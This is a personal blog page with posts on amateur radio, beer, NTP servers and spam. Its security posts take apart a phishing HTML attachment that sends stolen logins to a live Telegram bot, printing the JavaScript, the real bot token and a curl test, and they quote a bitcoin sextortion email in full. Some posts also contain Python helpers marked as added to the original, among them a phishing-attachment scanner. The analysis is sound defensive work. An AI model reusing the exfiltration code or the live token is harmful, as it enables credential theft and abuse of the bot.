Koos van den Hout

Koos van den Hout - Latest news, thoughts, rants, projects and other things to write about.
2024-04-19 New icon for items on my website
The whole development in generating text and images with "AI", which I see as mostly "hallucinating based on language patterns", has a lot of downsides in my opinion. So far these models have been capable of creating well-written disinformation complete with convincing-sounding reasoning, or have generated false images where the wrong number of fingers on a hand was the only indication something was not real.

So I don't like it, and at this moment I want to make clear that things I write here on this site are written by an actual human. To help that I wanted to create a web button in the style used years ago when we actually all had our own 'blog' and wanted to share things, not 'monetize' (verbing weirds language!).

It took me a while to find what I wanted, but the term I thought I wanted was 'web badge'. This led me to a lot of 88px wide by 31px high buttons, but that was not the style I was looking for. Eventually I searched based on the size of an image I already used:

webbutton VI Powered: this site is maintained with the vim editor

This image is 80px wide by 15px high. Searching for that gave me ACA 80x15 Brilliant Button Maker: Make your antipixel button with one click! which makes those buttons.

And this is the new button which will be in the footer of lots of pages on this site:

webbutton NO AI IN USE: original text on this site was written by a human

So the human readers can see an actual human wrote the text.

2024-04-18 Even more delay with Open Dutch Fiber (ODF)
Meanwhile the planned date for that Open Dutch Fiber connection seems to be slipping back even further. The message from Glasvezel in Utrecht - Open Dutch Fiber is now:
Fiber will soon be available at your address. We expect to be finished in your neighbourhood in December 2025.
The history: The municipality of Utrecht wants the fiber rollout to be finished before 2027. I am curious whether they will make that with this amount of postponement.

Other network

Meanwhile KPN glasvezel seems to have no plans at all for our address, probably because of the promises of ODF combined with the agreement with the municipality not to get in each other's way.

Fiber for buildings slated for demolition

At the same time, fibers from Open Dutch Fiber are sticking out of the ground for buildings slated for demolition on the Troelstralaan. This plan for demolition and rebuilding has been known for years; that fiber is being laid there anyway does not give me much confidence in the planning of Open Dutch Fiber.

2024-04-17 Fresh bitcoin extortion scam
The texts have been updated somewhat, but the gist is still the same:
Well, hello there, my perverted friend.
I'll get right to the point.
We've actually known each other for a while now, at least I've known you.
You can call me Big Brother or the All-Seeing Eye.
I'm a hacker who a few months ago gained access to your device, including your browser history and webcam.
And I recorded some videos of you jerking off to highly controversial "adult" videos.
I doubt very much you'd want your family, coworkers, and your entire contact list to see footage
of you pleasuring yourself, especially given the specifics of your favorite genre.
I'll also put these videos on porn sites, and they'll go viral, so much so that it will be physically impossible to remove them from everywhere.

How did I do that?
Because of your disregard for Internet security, I was able to easily install a Trojan horse on your device.
which accessed all the data on your device and allowed me to control it remotely.
Once I infected one device, I had no problem accessing all the other devices.
My spyware is embedded in the drivers and updates its signature every few hours, so no antivirus or firewall can even detect it.
So now I'm just gonna give you a condition. A small sum in exchange for your former quiet life.
Transfer 1200 USD to my bitcoin wallet:
3E5kH22Z5ozUhfqg3emYDQ9oDy1frgq3mr
As soon as I receive confirmation of the transfer, I will delete all the videos that compromise you, remotely erase the virus on your devices and you will never hear from me again.
Agree, it's a very small price to pay for not destroying your reputation in the eyes of others who, judging by your correspondence in messengers,
has an opinion of you as a decent human being.
You can think of me as a kind of mentor who wants you to start appreciating what you have.
You have 48 hours - I'll be notified as soon as you open this letter, and from then on it's a countdown.
If you've never dealt with cryptocurrency before, it's super easy - type "crypto exchange" into a search engine, and the next thing to do.
Here's what you shouldn't do:
Don't reply to my email. It was sent from a disposable e-mail account.
Don't call law enforcement. Remember, I have access to all of your devices, and as soon as I notice such activity, it will automatically lead to the release of all of your data.
Do not attempt to reinstall your system or factory reset your device.
First of all, I already have the video and all your data, and secondly, as I already said, I have remote access to all your devices and as soon as I notice such an attempt, it will lead to irreversible consequences.
Remember that crypto-addresses are anonymous, so you won't be able to figure me out from my wallet.
Anyway, let's make this a win-win situation.
I always keep my word, unless I'm being tricked. 
Advice for the future: take more seriously your security on the Internet. Also regularly change passwords and set up multi-factor authorization on all your accounts.
As always: this is a scam, nothing happened, the sender has absolutely nothing, just a wish to have hard to trace money come in.

Earlier items about bitcoin extortion scams: Earlier, earlier, earlier, earlier, earlier, earlier, earlier, earlier, earlier, earlier (although I think bitcoin is generally a really bad idea and a huge scam)

Update

I just noticed a variant of this scam which purports to have used the Pegasys spyware to get the information. If that was really true the amount in the scam message would need to be higher to pay for it!

2024-04-10 New countries in amateur radio: Fiji islands and Liberia
Yet more countries showing up and making the contact. This time both were only in digital mode (FT8), no morse yet.

First I saw 3D2AJT active on 17 meter FT8. It's a special event callsign in memory of "Zorro" JH1AJT and I saw that Fiji Islands was a new country for me, so I made the contact.

I also saw the A8OK dxpedition to Liberia active and had a contact in FT8 on the 20 meter band. I was somewhat lucky as I saw them 'restart' the transmitters and I was able to jump on the first CQ. They were also active in morse on the 17 meter band but a lot more people wanted that contact and I didn't have the time to sit behind the radio for hours.

Update 2024-04-13

Added A8OK on the 17 meter band in FT8 where I was one of the few (???) stations responding. Adding them in morse was a lot harder! After a session of about 40 minutes sending my call on the 10 meter band in morse I finally got through.

2024-04-08 I participated in the EA RTTY contest 2024
Mapped contacts PE4KH in the EA RTTY contest 2024
Last weekend was the EA RTTY Contest as organized by the Spanish amateur radio club URE.

I participated Saturday evening, the rest of the weekend was filled with other things. I made 30 contacts and stayed on the 20 meter band, so I entered as a single band (20m) operator.

I got a few stations from the USA and Canada in the log, which can be somewhat remarkable at the current propagation, but these are probably big contest stations with enough power and good antennas. The very remarkable contact was my first RTTY contact with Australia!

The end result was 30 contacts including 12 unique Spanish provinces.

2024-03-31 Finishing the radials on the multiband vertical and the first test
The portable multiband vertical antenna based on Teleskop 1/4 Lambda Vertikal - Draussenfunker.de had been on the project heap for two months now. I did some tests on how to connect the radials but until recently I didn't have a working way to make the connection. Crimping connectors on 8 small wires at once did not make a solid connection.

My new idea was to use a distribution block (Dutch: kroonsteentje) to connect the wires. I tinned all the 31 wires. I found out that 8 wires wouldn't fit easily in a 1.5 mm² opening so I redistributed them: from 3*8 + 1*7 to 4*6 + 1*7. That fit, and I connected all the wires on the other side of the distribution block together and to one wire to make an earth connection at the foot of the vertical antenna.

The original plan was to test the antenna in the back yard after I was done, but it started to rain. Later there was a break in the rain long enough to go outside with the antenna analyzer. I found out I could get a reasonable match on the 20, 17 and 15 meter bands. It was harder to find a reasonable match (SWR < 2.0) on the 12 and 10 meter bands. I originally planned to also try with the radio (the Yaesu FT857D) but it started to look dark again and I brought everything back in. And yes, it started raining again.

Progress on this project, this can be a nice antenna for /P activities. Or to add the 15 meter band at home for contests.

2024-03-31 Phishing mails with built-in forms doing API calls
In the phishing mail today:
   Hello;
   Your Office Email Has a New Voicenote From ITSupport @ idefix.net

   New Voice Message Details:

   Received from:
   ITSupport @ idefix.net

   Date/Time:

   3/31/2024 4:26:27 a.m.

   Duration:

   03:21 secs.

   VM Transcript:

   RE: Account suspension notice//23 Pending Messages.FYO

   Play Messages:

   Download/view attached messages
There is an attachment which is also HTML, and looking into it I see a standard phishing form asking for username and password, which handles the input in the following way:
                    var apiss = "https://api.telegram.org/bot6546628146:AAHEcFmFfGBBHfhUKxJ3P-4d9ip_Zqm2ED0/sendMessage?chat_id=-1002016417277&text=NEW%20LOGIN%0A%0Amail%20%3A%20" + mail + "%0Apassword%20%3A%20" + passwd + "%0A";
                    var xhr = new XMLHttpRequest();
..
                    xhr.open('GET', apiss, true);
                    xhr.send();
So this is easy to test...
$ curl -v 'https://api.telegram.org/bot6546628146:AAHEcFmFfGBBHfhUKxJ3P-4d9ip_Zqm2ED0/sendMessage?chat_id=-1002016417277&text=NEW%20LOGIN%0A%0Amail%20%3A%20president@whitehouse.gov%0Apassword%20%3A%20kensentme%0A'
*   Trying 2001:67c:4e8:f004::9:443...
* Connected to api.telegram.org (2001:67c:4e8:f004::9) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
* TLSv1.0 (OUT), TLS header, Certificate Status (22):
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS header, Certificate Status (22):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS header, Finished (20):
* TLSv1.2 (IN), TLS header, Supplemental data (23):
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
* TLSv1.2 (IN), TLS header, Supplemental data (23):
* TLSv1.3 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS header, Supplemental data (23):
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
* TLSv1.2 (IN), TLS header, Supplemental data (23):
* TLSv1.3 (IN), TLS handshake, Finished (20):
* TLSv1.2 (OUT), TLS header, Finished (20):
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS header, Supplemental data (23):
* TLSv1.3 (OUT), TLS handshake, Finished (20):
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384
* ALPN, server accepted to use h2
* Server certificate:
*  subject: CN=api.telegram.org
*  start date: Mar 26 07:39:18 2023 GMT
*  expire date: Apr 26 07:39:18 2024 GMT
*  subjectAltName: host "api.telegram.org" matched cert's "api.telegram.org"
*  issuer: C=US; ST=Arizona; L=Scottsdale; O=GoDaddy.com, Inc.; OU=http://certs.godaddy.com/repository/; CN=Go Daddy Secure Certificate Authority - G2
*  SSL certificate verify ok.
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* TLSv1.2 (OUT), TLS header, Supplemental data (23):
* TLSv1.2 (OUT), TLS header, Supplemental data (23):
* TLSv1.2 (OUT), TLS header, Supplemental data (23):
* Using Stream ID: 1 (easy handle 0x564250509eb0)
* TLSv1.2 (OUT), TLS header, Supplemental data (23):
> GET /bot6546628146:AAHEcFmFfGBBHfhUKxJ3P-4d9ip_Zqm2ED0/sendMessage?chat_id=-1002016417277&text=NEW%20LOGIN%0A%0Amail%20%3A%20president@whitehouse.gov%0Apassword%20%3A%20kensentme%0A HTTP/2
> Host: api.telegram.org
> user-agent: curl/7.81.0
> accept: */*
> 
* TLSv1.2 (IN), TLS header, Supplemental data (23):
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* TLSv1.2 (IN), TLS header, Supplemental data (23):
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* old SSL session ID is stale, removing
* TLSv1.2 (IN), TLS header, Supplemental data (23):
* Connection state changed (MAX_CONCURRENT_STREAMS == 128)!
* TLSv1.2 (OUT), TLS header, Supplemental data (23):
* TLSv1.2 (IN), TLS header, Supplemental data (23):
< HTTP/2 200 
< server: nginx/1.18.0
< date: Sun, 31 Mar 2024 18:35:01 GMT
< content-type: application/json
< content-length: 343
< strict-transport-security: max-age=31536000; includeSubDomains; preload
< access-control-allow-origin: *
< access-control-allow-methods: GET, POST, OPTIONS
< access-control-expose-headers: Content-Length,Content-Type,Date,Server,Connection
< 
* Connection #0 to host api.telegram.org left intact
{"ok":true,"result":{"message_id":7322,"sender_chat":{"id":-1002016417277,"title":"revengebotchannel","type":"channel"},"chat":{"id":-1002016417277,"title":"revengebotchannel","type":"channel"},"date":1711910101,"text":"NEW LOGIN\n\nmail : president@whitehouse.gov\npassword : kensentme","entities":[{"offset":18,"length":24,"type":"email"}]}}
So there is a telegram channel 'revengebotchannel' and I just posted a report of a new phished account there. Although I don't think those credentials will work. This is the second phishing attempt I see for a different address but with the same bot api data, so someone with time on their hands could write a script to spam 'revengebotchannel' with fake login data.

An interesting way of not having to host a phishing site somewhere with a chance of takedown, but just let people run this as a local file in their browser.

Update: keeps going

Ten days later I see different phishing, this time trying to get me to view a proof of payment, but with the same api key to post the result. It looks like the 'message_id' is an increasing number specific for this chat. The number 7322 would mean 7322 messages have been exchanged in this channel?
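A defensive counterpart to the observation above, as an added example that is not part of the original post: a scanner for HTML attachments that finds Telegram Bot API endpoints next to a password field, and fingerprints the token so that different lures using the same bot can be correlated without storing the secret. The sample attachments, bot id, token and chat id are constructed placeholders, and the function names and verdict labels are assumptions of this example.

```python
import hashlib
import re
from urllib.parse import parse_qs

# Bot API URL shape used by the attachment: /bot<numeric id>:<secret>/<method>?...
BOT_URL = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)"
    r"/(?P<method>[A-Za-z]+)(?P<rest>[^\s\"'<>]*)",
    re.IGNORECASE,
)
PASSWORD_INPUT = re.compile(r"<input\b[^>]*\btype\s*=\s*[\"']?password", re.IGNORECASE)

# Constructed samples: placeholder bot id, token and chat id, not real values.
EXFIL_JS = (
    'var apiss = "https://api.telegram.org/bot0000000000:PLACEHOLDER_TOKEN/'
    'sendMessage?chat_id=-1000000000000&text=NEW%20LOGIN%0A%0Amail%20%3A%20"'
    ' + mail + "%0Apassword%20%3A%20" + passwd + "%0A";'
)
SAMPLE_VOICEMAIL = (
    "<html><body><form><input type='text' id='mail'>"
    "<input type=\"password\" id='passwd'></form>"
    "<script>" + EXFIL_JS + "</script></body></html>"
)
SAMPLE_PAYMENT = SAMPLE_VOICEMAIL.replace("<form>", "<h1>Proof of payment</h1><form>")
SAMPLE_BENIGN = "<html><body><form><input type='password' name='p'></form></body></html>"


def scan_attachment(html: str) -> dict:
    """Report Telegram Bot API endpoints in an HTML attachment, token redacted."""
    endpoints = []
    for m in BOT_URL.finditer(html):
        params = parse_qs(m.group("rest").lstrip("?"))
        token = m.group("bot_id") + ":" + m.group("secret")
        endpoints.append({
            "bot_id": m.group("bot_id"),
            "method": m.group("method"),
            "chat_id": params.get("chat_id", [None])[0],
            # Decoded static part of the message, e.g. "NEW LOGIN\n\nmail : "
            "text_template": params.get("text", [""])[0],
            # Fingerprint instead of the secret: enough to correlate samples.
            "token_fp": hashlib.sha256(token.encode()).hexdigest()[:16],
        })
    has_password = bool(PASSWORD_INPUT.search(html))
    if endpoints and has_password:
        verdict = "credential-exfil"
    elif endpoints:
        verdict = "telegram-endpoint"
    else:
        verdict = "no-telegram-endpoint"
    return {"verdict": verdict, "has_password_field": has_password,
            "endpoints": endpoints}


def correlate(samples: dict) -> dict:
    """Group sample names by (bot id, chat id, token fingerprint)."""
    groups = {}
    for name, html in samples.items():
        for ep in scan_attachment(html)["endpoints"]:
            key = (ep["bot_id"], ep["chat_id"], ep["token_fp"])
            groups.setdefault(key, []).append(name)
    return groups


if __name__ == "__main__":
    seen = {"voicemail.html": SAMPLE_VOICEMAIL, "payment.html": SAMPLE_PAYMENT}
    for key, names in correlate(seen).items():
        print(key, "used by", names)
```

The same pattern works as a mail-gateway rule: an HTML attachment that combines a password input with an api.telegram.org/bot URL has no legitimate reason to reach a mailbox.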

2024-03-29 Cornet Smoked
A strong blonde beer with a typical taste. I would call it 'peaty' and not 'smoked' but that's because I am familiar with malt whisky tastes.

It's a bit strong for what I expect from a blonde beer: 8.5 % alcohol by volume. The label on the front of the bottle clearly says 'Cornet oaked smoked', the label on the back (and the website) call it 'Cornet smoked'. Colour is light yellow, not very clear, almost reminding me of white beer.

The beer details

Company: Cornet
Beer name: Cornet smoked
Beer style: Blonde
Alcohol by volume: 8.5 %

2024-03-29 New country in amateur radio: Lesotho
Another chance to get a new entity/country in my logs: the EI DX Group was in Lesotho.

Lesotho is a small country in the southern part of the African continent. It is completely surrounded by South Africa, but it has been an independent country since 1966. More information on the country of Lesotho can be found in Wikipedia.

I chased this dxpedition last Wednesday and it didn't happen in FT8. But it did happen in morse. What helped a lot was a remark I heard at the radio club from a very active DXer about their morse handling. I still learn new things in amateur radio!

I also got confirmation of this contact within 3 days via Logbook of The World, which I really did not expect. I will probably still request a QSL card and pay for it.

The statistics in entities worked/confirmed

I now have made contacts with 189 different amateur radio entities in total, with 177 confirmed. In morse I have made contacts with 117 different amateur radio entities of which 108 are confirmed.

2024-03-27 Wondering about the scam business model of some spam
Sometimes I really wonder what the scam is behind some spam I receive. Recently I've seen a few of this type, where the spam uses a lot of words to say "I see a charge for something on your website, could you please explain". A lot of words, but things that would help the receiver find the transaction are all missing, like amount, transaction numbers, name of the website where you "found" that contact information.

So clearly the next step the scammer wants is for the webshop owner to reply with a lot of questions. I wonder what happens next. Maybe I should reply from a webmail account.

Text of the version seen today:
   Dear,
   I hope this message finds you well. I'm writing to bring to your
   attention an unexpected charge that appeared on my PayPal account,
   which seems to have been made on your online shop.
   This came as a disbelief to me, as I have never engaged with your
   platform before. I've reached out to my bank and have started the
   necessary actions to dispute this claim, including filing a report with
   the relevant authorities.
   It would be helpful if you could provide me with any pertinent details
   about the transaction, like the order number, and any other information
   you think may help clarify the situation.
   I should clarify that I have substantial evidence, including bank
   statements and other documents, to support my claim that I did not
   authorize this transaction.
   I'm looking forward to your prompt response on this matter.
   Best regards,
   Judy Sharp

2024-03-23 Erdinger Weißbier
Found in the local supermarket, a really German beer from Erdinger. Erdinger is quite proud of brewing it according to 'Bayerische Edelreifung'.

In taste it is what I expect of a white beer, but a touch more bitter compared to others.

The beer details

Company: Erdinger
Beer name: Weißbier
Beer style: White beer
Alcohol by volume: 5.3 %

2024-03-22 Filtering SMTP attempts from Iran
A while ago I got tired of constant SMTP attempts from addresses within the 46.148.32.0/20 range. So I set up a special firewall rule for it. This range points to a location in Iran which has a lot of office routers in it but a small part of it seems to be a pool of virtual servers.

Today I had a look in the mail log because I was expecting a mail which didn't arrive, but I saw a very similar pattern...
Mar 22 16:28:50 gosper sm-mta[10196]: STARTTLS=server, relay=[80.244.11.147], version=TLSv1.2, verify=NOT, cipher=ECDHE-RSA-AES256-GCM-SHA384, bits=256/256
Mar 22 16:28:53 gosper sm-mta[10196]: 42MFSowG010196: [80.244.11.147] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA-SSL
Mar 22 16:28:54 gosper sm-mta[10198]: STARTTLS=server, relay=[80.244.11.132], version=TLSv1.2, verify=NOT, cipher=ECDHE-RSA-AES256-GCM-SHA384, bits=256/256
Mar 22 16:29:04 gosper sm-mta[10198]: 42MFSsUs010198: [80.244.11.132] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA-SSL
Mar 22 16:29:30 gosper sm-mta[10241]: STARTTLS=server, relay=[80.244.11.151], version=TLSv1.2, verify=NOT, cipher=ECDHE-RSA-AES256-GCM-SHA384, bits=256/256
Mar 22 16:29:33 gosper sm-mta[10241]: 42MFTUfC010241: [80.244.11.151] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA-SSL
Mar 22 16:30:12 gosper sm-mta[10338]: STARTTLS=server, relay=[80.244.11.98], version=TLSv1.2, verify=NOT, cipher=ECDHE-RSA-AES256-GCM-SHA384, bits=256/256
Mar 22 16:30:15 gosper sm-mta[10338]: 42MFUCVC010338: [80.244.11.98] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA-SSL
Mar 22 16:30:21 gosper sm-mta[10345]: STARTTLS=server, relay=[80.244.11.95], version=TLSv1.2, verify=NOT, cipher=ECDHE-RSA-AES256-GCM-SHA384, bits=256/256
Mar 22 16:30:26 gosper sm-mta[10345]: 42MFULOt010345: [80.244.11.95] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA-SSL
Mar 22 16:30:31 gosper sm-mta[10351]: STARTTLS=server, relay=[80.244.11.82], version=TLSv1.2, verify=NOT, cipher=ECDHE-RSA-AES256-GCM-SHA384, bits=256/256
Mar 22 16:30:37 gosper sm-mta[10351]: 42MFUUrC010351: [80.244.11.82] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA-SSL
So now 80.244.11.0/24 is added to the same firewall rule. And again this is in Iran with very comparable traffic.
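The pattern in the log above can be picked out automatically. The following is an added example, not part of the original post: it counts sendmail "did not issue MAIL/EXPN/VRFY/ETRN" events per source network and reports networks where several distinct hosts show the behaviour, which are the candidates for a range-wide firewall rule. The log lines are constructed with documentation addresses, and the /24 and /64 grouping and the threshold of three hosts are assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# Matches the sendmail line logged when a client connects (and here completes
# STARTTLS) but never starts a mail transaction. The optional parts tolerate a
# resolved hostname before the bracketed address and a "(may be forged)" note.
NO_MAIL = re.compile(
    r"sm-mta\[\d+\]: \w+: (?:\S+ )?\[(?P<ip>[^\]]+)\] (?:\(may be forged\) )?"
    r"did not issue MAIL/EXPN/VRFY/ETRN during connection to (?P<daemon>\S+)"
)

# Constructed sample in the format shown in the post (documentation addresses).
SAMPLE_LOG = """\
Mar 22 16:28:50 mx sm-mta[10196]: STARTTLS=server, relay=[203.0.113.147], version=TLSv1.2, verify=NOT, cipher=ECDHE-RSA-AES256-GCM-SHA384, bits=256/256
Mar 22 16:28:53 mx sm-mta[10196]: 42MFSaaa010196: [203.0.113.147] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA-SSL
Mar 22 16:29:04 mx sm-mta[10198]: 42MFSbbb010198: [203.0.113.132] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA-SSL
Mar 22 16:29:33 mx sm-mta[10241]: 42MFTccc010241: [203.0.113.151] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA-SSL
Mar 22 16:30:15 mx sm-mta[10338]: 42MFUddd010338: [203.0.113.147] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA-SSL
Mar 22 16:31:40 mx sm-mta[10400]: 42MFVeee010400: [198.51.100.7] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA
Mar 22 16:32:02 mx sm-mta[10411]: 42MFWfff010411: from=<alice@example.org>, size=1234, nrcpts=1, relay=mail.example.org [192.0.2.10]
"""


def network_of(ip_text, v4_prefix=24, v6_prefix=64):
    """Map an address to its enclosing network (assumed /24 for IPv4, /64 for IPv6)."""
    if ip_text.startswith("IPv6:"):  # sendmail prefixes IPv6 literals this way
        ip_text = ip_text[5:]
    ip = ipaddress.ip_address(ip_text)
    prefix = v4_prefix if ip.version == 4 else v6_prefix
    return ipaddress.ip_network(f"{ip}/{prefix}", strict=False)


def suspicious_networks(log_text, min_hosts=3):
    """Return (network, distinct hosts, probes) for networks with >= min_hosts hosts."""
    hosts = defaultdict(set)
    probes = defaultdict(int)
    for line in log_text.splitlines():
        m = NO_MAIL.search(line)
        if not m:
            continue
        try:
            net = network_of(m.group("ip"))
        except ValueError:
            continue  # not an address literal, skip the line
        hosts[net].add(m.group("ip"))
        probes[net] += 1
    flagged = [(str(net), len(h), probes[net])
               for net, h in hosts.items() if len(h) >= min_hosts]
    # Most distinct hosts first, then by network text for a stable order.
    return sorted(flagged, key=lambda row: (-row[1], row[0]))


if __name__ == "__main__":
    for net, n_hosts, n_probes in suspicious_networks(SAMPLE_LOG):
        print(f"{net}: {n_hosts} hosts, {n_probes} connections without mail")
```

Requiring several distinct hosts keeps a single misbehaving client, such as the one-off address in the sample, from getting its whole network blocked.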

2024-03-20 Having the ntpserver at home ticking again
I had some time to look at why the rebuilt ntp server with ntpsec wasn't accepting NMEA/PPS and found [Solved] NTPSec: no servers found error despite finding the server.

I edited /etc/ntpsec/ntp.conf adding my own server lines (first in the peer 127.127 notation, later with refclock) and minimizing the external clocks to 1 as backup. But I got 'bitten' by this bit of configuration:
# Comment this out if you have a refclock and want it to be able to discipline
# the clock by itself (e.g. if the system is not connected to the network).
#tos minclock 4 minsane 3
ntpsec with 3 configured clocks and 'tos minclock 4' will happily start and not report a configuration error, but it will never start disciplining the local clock.
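Because the daemon starts without complaint in this state, the mismatch can be caught before deployment. The following pre-flight check is an added example, not part of the original post or of ntpsec: it counts the time sources in an ntp.conf and compares them with the `tos minclock` and `tos minsane` values. The sample configuration is constructed, and the rule "warn when there are fewer sources than the threshold" is an assumption based on the behaviour described here.

```python
# Directives that each configure exactly one time source. "pool" is counted
# separately because it expands to an unknown number of servers at run time.
SOURCE_DIRECTIVES = {"server", "peer", "refclock"}

# Constructed sample: two local reference clocks in 127.127 notation plus one
# external server, with the distribution default "tos" line still active.
SAMPLE_CONF = """\
driftfile /var/lib/ntpsec/ntp.drift
# Comment this out if you have a refclock and want it to be able to discipline
# the clock by itself (e.g. if the system is not connected to the network).
tos minclock 4 minsane 3
server 127.127.20.0   # NMEA
server 127.127.22.0   # PPS
server ntp.example.net iburst
"""


def lint_ntp_conf(text):
    """Return source counts, tos thresholds and warnings for an ntp.conf text."""
    sources, pools, tos = 0, 0, {}
    for raw in text.splitlines():
        words = raw.split("#", 1)[0].split()  # drop comments, tokenize
        if not words:
            continue
        directive = words[0].lower()
        if directive in SOURCE_DIRECTIVES:
            sources += 1
        elif directive == "pool":
            pools += 1
        elif directive == "tos":
            # "tos" takes name/value pairs; only the two thresholds matter here.
            for name, value in zip(words[1::2], words[2::2]):
                if name in ("minclock", "minsane") and value.isdigit():
                    tos[name] = int(value)
    warnings = []
    if not pools:  # with a pool the real source count is not known statically
        for name in ("minclock", "minsane"):
            if name in tos and sources < tos[name]:
                warnings.append(
                    f"tos {name} {tos[name]} exceeds the {sources} configured "
                    "time sources; the clock may never be disciplined"
                )
    return {"sources": sources, "pools": pools, "tos": tos, "warnings": warnings}


if __name__ == "__main__":
    for warning in lint_ntp_conf(SAMPLE_CONF)["warnings"]:
        print("WARNING:", warning)
```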

After commenting it out the local NMEA/PPS clock is selected after a few minutes, but after running for a while the local NMEA/PPS clock is again seen as a falseticker, but at least the ntpd process is disciplining the local clock and serving time.
$ ntpq -pn
     remote           refid      st t when poll reach   delay   offset   jitter
===============================================================================
*2a00:d78:0:712: .MRS.            1 u   20  128  377  15.6924 -11.6730   1.9191
xPPS(0)          .PPS.            0 l   58   64  377   0.0000  -8.9242   1.3533
xNMEA(0)         .GPS.            0 l    4   64  377   0.0000 -67.2428   0.9995
Without ntp disciplining the clock the error was more than 5 seconds within a week, so by itself the Raspberry Pi isn't a very good timekeeper.

I'm not sure I'm completely happy with the change to ntpsec.

Trying with ntpd built from source

I got too annoyed with ntpsec not accepting the NMEA/PPS clock, I want a timeserver that can work standalone from the time information available from the GPS hat.

With ntpd built from the authoritative source Network Time Protocol I get better results after a while. Good time takes a bit of time. Now the local GPS NMEA stream and PPS pulses are seen correctly:
$ ntpq -pn
     remote           refid      st t when poll reach   delay   offset   jitter
===============================================================================
o127.127.22.0    .PPS.            0 u    6   16  377    0.000    2.594    0.489
*127.127.20.0    .GPS.            0 u   12   16  377    0.000   18.134    1.479
+2a00:d78:0:712: .MRS.            1 u   59   64  377   15.268    2.276   13.940

Letting this run for a while

After a few hours the NTP pool was happy again with my server and it was in the rotation. Soon over 600 unique clients had done requests for the current time.

2024-03-17 Getting security reports for this website
This website (and others I host) follow the security.txt standard. The websites get scanned regularly anyway, and maybe some of those scans are specifically aimed at finding a vulnerability in a website linked to me as a person, and not just a scan of a random site on the Internet.

So in case someone finds a vulnerability and wants to report it, they can find the contact information in a well-known format.

So far I've had some enquiries about a bug-bounty program, but as this is a private site I'm not considering that at the moment. The best I can do is a 'Hall of Fame'.

2024-03-16 New country in amateur radio: Grenada
Currently the Rockall group is in Grenada which is a part of the West Indies islands in the Caribbean Sea. Entry on Grenada in Wikipedia. As I didn't have Grenada in my amateur radio logs yet I wanted to get it in the log, but the weeks of the DXpedition were also filled with lots of other things that didn't leave me much time. During the last days of the DXpedition I finally got around to sitting down and trying to work them. The first contact was 17 meter FT8 on Thursday evening and today (Saturday), officially the last day of the DXpedition I managed to get in the log on 12 meter CW, right on time.

I had already tried getting through on CW on Thursday and Friday evening, but the Americas are always the hard DX from my location because there is a lot of house between my antenna and that part of the world. And I recently learned that European DXers start with a 1 kiloHertz split on CW, and American DXers with a 2 kiloHertz split. Even though they are from Belgium they were mostly making contacts at 2 kiloHertz split and above.

2024-03-14 Add brltty (braille tty) to the list of processes that can confuse serial devices
While I was installing perlman as my new radio desktop the nanokeyer sent a question mark ? at me, which can only be caused by something on the computer sending characters over the serial interface. This reminded me of removing modemmanager to avoid conflicts with other serial devices.

This time I had already removed modemmanager so it was something different. I found out brltty is another program which probes serial ports.

I can fully support brltty wanting to autoconfigure stuff so a blind person doesn't need a seeing person to configure their computer first, but I don't like programs probing any serial port. So I also disabled and removed brltty and now the nanokeyer has no more question marks for me.

The proxmark3 manual has a dire warning in Modem Manager must be discarded:
ModemManager is a real threat that can lead to a bricked Proxmark3, read this very attentively.
and I thought the interaction between brltty and the Proxmark3 could have the same issue. But brltty seems to be looking for specific USB serial adapters (ch341 based).

If I read Bug #1990189 “brlttty claiming CH341 usbtty device blocking acce...” : Bugs : brltty package : Ubuntu correctly, work is being done on making the udev rules for the brltty driver be more specific to the braille tty devices using this ch341 chip. In the interim: be careful.

2024-03-13 Rebuilding the ntp server at home
The home timeserver I built in 2020 stopped responding and it turned out the MicroSD card was starting to give errors. So time to take one of the newer MicroSD cards and rebuild the system. Of course the rebuild is done with the latest version of Raspbian / Raspberry Pi OS: Raspbian GNU/Linux 12 bookworm.

This means some things are newer and need time to sort out what has changed and what the new methods are.

ntpsec

The ntp server software is now ntpsec, but almost all of the configuration seems to be the same. I haven't got PPS running at the moment, somehow ppstest is satisfied but ntpsec is showing the PPS peer in reject state.

w1retap

There is a w1retap project on sourceforge and a tree on github, but the real new location to find it is stronnag / w1retap: w1retap is an application to log data from Dallas 'one wire' sensors to relational databases or files. It is developed on Linux, but should be portable to other POSIX systems. on codeberg.org as linked from Netley Marsh 1 Wire Weather Station - Technical Information. Building w1retap was completely different with meson and ninja which are absolutely new to me. Building the programs did work and resulted in a working program. At the moment there is no readout of the humidity sensor, but without any logging about trying to read it.

2024-03-13 I bought and installed a new 'radio workstation' perlman
Lately the 'radio workstation' thompson was having trouble with the load caused by decoding FT8. Or rather I couldn't do much else while wsjt-x was decoding signals, starting anything else cpu intensive would cause delays. And the old annoyance that I couldn't let the screensaver set the monitors to powerdown because it would make one monitor go away and appear again was still happening.

So time for something new. Or less old. A new PC would be complete overkill for what I do with it! I decided to go with a refurbished Lenovo small form factor PC. I just wanted faster CPU and I/O, enough display outputs to drive two monitors via digital connections and enough USB for connections to radio(s), morse keyer(s), keyboard and mouse.

